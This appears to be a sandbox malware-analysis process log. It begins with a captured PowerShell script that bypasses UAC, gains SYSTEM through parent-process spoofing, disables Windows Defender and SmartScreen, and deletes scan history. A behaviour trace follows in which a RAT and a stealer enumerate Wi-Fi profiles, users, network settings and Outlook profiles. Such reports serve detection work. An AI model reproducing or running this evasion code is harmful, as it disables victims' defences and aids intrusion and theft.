     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:4392
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:3252
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵PID:1044
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵PID:3340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1636 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4688
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4200
-
-
C:\Windows\system32\findstr.exefindstr All3⤵PID:1600
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid2⤵PID:828
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:4184
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1960
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd"2⤵PID:1004
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵PID:1652
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:2660
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3920
-
C:\Users\Admin\Downloads\rat.exe"C:\Users\Admin\Downloads\rat.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1732 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE4EC.tmp.bat""2⤵PID:2624
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1372
-
-
-
C:\Users\Admin\Downloads\Client.exe"C:\Users\Admin\Downloads\Client.exe"1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:2804 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2840 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1540
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1400
-
-
C:\Windows\system32\findstr.exefindstr All3⤵PID:2056
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid2⤵PID:336
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3064
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe"2⤵PID:5068
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:3392
-
-
C:\Windows\system32\HOSTNAME.EXEhostname3⤵PID:4972
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername3⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\system32\net.exenet user3⤵PID:4264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:3136
-
-
-
C:\Windows\system32\query.exequery user3⤵PID:4208
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"4⤵PID:1052
-
-
-
C:\Windows\system32\net.exenet localgroup3⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:4804
-
-
-
C:\Windows\system32\net.exenet localgroup administrators3⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:5056
-
-
-
C:\Windows\system32\net.exenet user guest3⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest4⤵PID:3920
-
-
-
C:\Windows\system32\net.exenet user administrator3⤵PID:1584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator4⤵PID:5040
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command3⤵PID:876
-
-
C:\Windows\system32\tasklist.exetasklist /svc3⤵
- Enumerates processes with tasklist
PID:756
-
-
C:\Windows\system32\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:3112
-
-
C:\Windows\system32\ROUTE.EXEroute print3⤵PID:3208
-
-
C:\Windows\system32\ARP.EXEarp -a3⤵
- Network Service Discovery
PID:3224
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:2096
-
-
C:\Windows\system32\sc.exesc query type= service state= all3⤵
- Launches sc.exe
PID:1632
-
-
C:\Windows\system32\netsh.exenetsh firewall show state3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1628
-
-
C:\Windows\system32\netsh.exenetsh firewall show config3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6160
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7088
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9736
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10400
-
-
